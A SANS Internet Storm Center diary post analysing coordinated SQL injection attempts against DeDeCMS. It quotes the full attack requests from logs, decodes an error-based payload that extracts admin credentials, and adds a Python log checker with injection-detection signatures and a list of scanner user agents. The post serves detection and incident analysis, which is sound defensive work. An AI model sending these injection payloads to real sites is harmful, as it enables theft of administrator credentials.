
SANS ISC InfoSec Handlers Diary Blog



Lazy Coordinated Attacks Against Old Vulnerabilities

Published: 2015-05-22
Last Updated: 2015-05-22 18:20:07 UTC
by Johannes Ullrich (Version: 1)

Typically we try to divide attackers into different groups, all the way from script kiddies (no resources, no skills, quite a bit of time and persistence) to more advanced state-sponsored attackers (lots of resources, decent skills, and the ability to conduct long-lasting persistent attacks).

So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS conducted from what looks like several IP addresses at the same time, which appeared to share the load.

The attack:

GET /uploads/plus/search.php?keyword=11& typeArr[%60@%27%60and%28SELECT 1%20FROM%28select count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29 from dede_admin Limit 0,1%29%29a from information_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1" 301 178 "-" "Python-urllib/2.7"

DeDeCMS is a Drupal-like content management system popular in China [1]. Exploits like the one above have been used at least since 2013 [2]. The site that was attacked above does not use DeDeCMS, so the attacker did not do any reconnaissance.

The attacker also doesn't bother modifying the user agent and keeps the "Python-urllib/2.7" user agent, indicating that the tool used to conduct the scan was written in Python. Many web application firewalls would block the request just for using that user agent.

The SQL statement that is being attempted:

SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/*'*/concat(0x5f,userid,0x5f,pwd,0x5f) from dede_admin Limit 0,1))a from information_schema.tables group by a)b)]=1

A nice piece of SQL obfuscation, but I believe the goal is to retrieve the first username and password from the dede_admin table.

Sort of interesting: these were not the only attacks from these two IP addresses, and they did start out with some reconnaissance:

GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Here they spoof the Google user agent. They even first try out the "plus/search.php" URL:

GET //plus/search.php?keyword=as&typeArr[111%3D@`\x5C'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C'`+]=a HTTP/1.1" 404 9093 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

But even though it returns a 404, they still proceed with the attack. 
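The requests quoted above can be spotted in ordinary web server logs without any DeDeCMS-specific knowledge: the payload carries the classic error-based MySQL injection pattern (floor(rand(0)*2) with a group by over information_schema), the first probe carries a union select, and both the "Python-urllib" scanner user agent and the unverified Googlebot claim stand out on their own. The following checker is an added example written for this diary, not code from the ISC or from any of the tools discussed; the four combined-format log lines are constructed (with documentation-range IP addresses) and modelled on the requests shown above, and the signature names are my own. It decodes each request, matches the injection signatures, records user-agent findings, and summarizes activity per source IP, which is how the two cooperating addresses and the post-404 follow-up become visible.

```python
import re
import urllib.parse

# Constructed sample log lines in combined log format (not taken from a real server).
# Lines 2 and 3 mirror the two probes quoted in the diary; line 4 is benign traffic.
SAMPLE_LOG = r'''
198.51.100.10 - - [22/May/2015:10:00:01 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.10 - - [22/May/2015:10:00:02 +0000] "GET //plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,userid,pwd+from+`%23@__admin`%23@`\'`+]=a HTTP/1.1" 404 9093 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.11 - - [22/May/2015:10:00:03 +0000] "GET /uploads/plus/search.php?keyword=11&typeArr[%60@%27%60and%28SELECT 1%20FROM%28select count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29 from dede_admin Limit 0,1%29%29a from information_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1" 301 178 "-" "Python-urllib/2.7"
203.0.113.5 - - [22/May/2015:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/38.0"
'''

# Combined log format: ip ident user [timestamp] "request" status size "referer" "user agent".
# The request is matched up to the closing quote so that spaces inside the URL survive.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures applied to the decoded, comment-stripped, lowercased URL (names are my own).
SQLI_SIGNATURES = {
    "error_based_rand_groupby": re.compile(r"floor\(\s*rand\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "information_schema": re.compile(r"information_schema"),
    "union_select": re.compile(r"\bunion\s+select\b"),
    "dedecms_admin_table": re.compile(r"dede_admin|@__admin"),
    "dedecms_typearr_param": re.compile(r"typearr\[[^\]]*[`'()@]"),
}

# User-agent substrings of common scripting clients; many WAFs block on these alone.
SCANNER_UAS = ("python-urllib", "python-requests", "curl/", "wget/")


def parse_line(line):
    """Return a dict of log fields plus method and path, or None if the line does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    method, _, rest = rec["request"].partition(" ")
    path, _, _version = rest.rpartition(" ")   # drop the trailing "HTTP/1.1"
    rec["method"] = method
    rec["path"] = path or rest
    return rec


def normalize(path):
    """Undo percent/plus encoding, drop /*...*/ comments used to hide quotes, collapse whitespace."""
    decoded = urllib.parse.unquote_plus(path)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).lower()


def analyze_record(rec):
    """List the signature and user-agent findings for one parsed request."""
    findings = [name for name, pat in SQLI_SIGNATURES.items() if pat.search(normalize(rec["path"]))]
    ua = rec["ua"].lower()
    if any(s in ua for s in SCANNER_UAS):
        findings.append("scanner_user_agent")
    if "googlebot" in ua:
        # A genuine Googlebot reverse-resolves to a Google-owned host; that lookup needs
        # network access, so here the claim is only recorded for later verification.
        findings.append("claims_googlebot_verify_rdns")
    return findings


def analyze_log(text):
    """Parse every line of a log excerpt and return one result per parsed request."""
    results = []
    for line in text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings = analyze_record(rec)
        results.append({
            "ip": rec["ip"],
            "status": rec["status"],
            "path": rec["path"][:60],
            "findings": findings,
            "sqli": any(f in SQLI_SIGNATURES for f in findings),
        })
    return results


def summarize_by_ip(results):
    """Group results per source IP so coordinated sources and post-404 follow-ups stand out."""
    summary = {}
    for r in results:
        s = summary.setdefault(r["ip"], {"requests": 0, "sqli_attempts": 0, "statuses": set(), "findings": set()})
        s["requests"] += 1
        s["sqli_attempts"] += int(r["sqli"])
        s["statuses"].add(r["status"])
        s["findings"].update(r["findings"])
    return summary


if __name__ == "__main__":
    results = analyze_log(SAMPLE_LOG)
    for r in results:
        print(r["ip"], r["status"], r["path"], r["findings"])
    for ip, s in summarize_by_ip(results).items():
        print(ip, s)
```

The decode step matters: the second probe hides "union select" behind plus-encoding and mixed case, and the third hides a quote inside a /*'*/ comment, so matching the raw log line would miss both. A real deployment would replace the Googlebot note with a reverse-DNS and forward-confirmation check, and would feed the per-IP summary into whatever blocklist or alerting the site already uses.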


[1] http://dedecms.com
[2] http://0day5.com/archives/341

---
Johannes B. Ullrich, Ph.D.
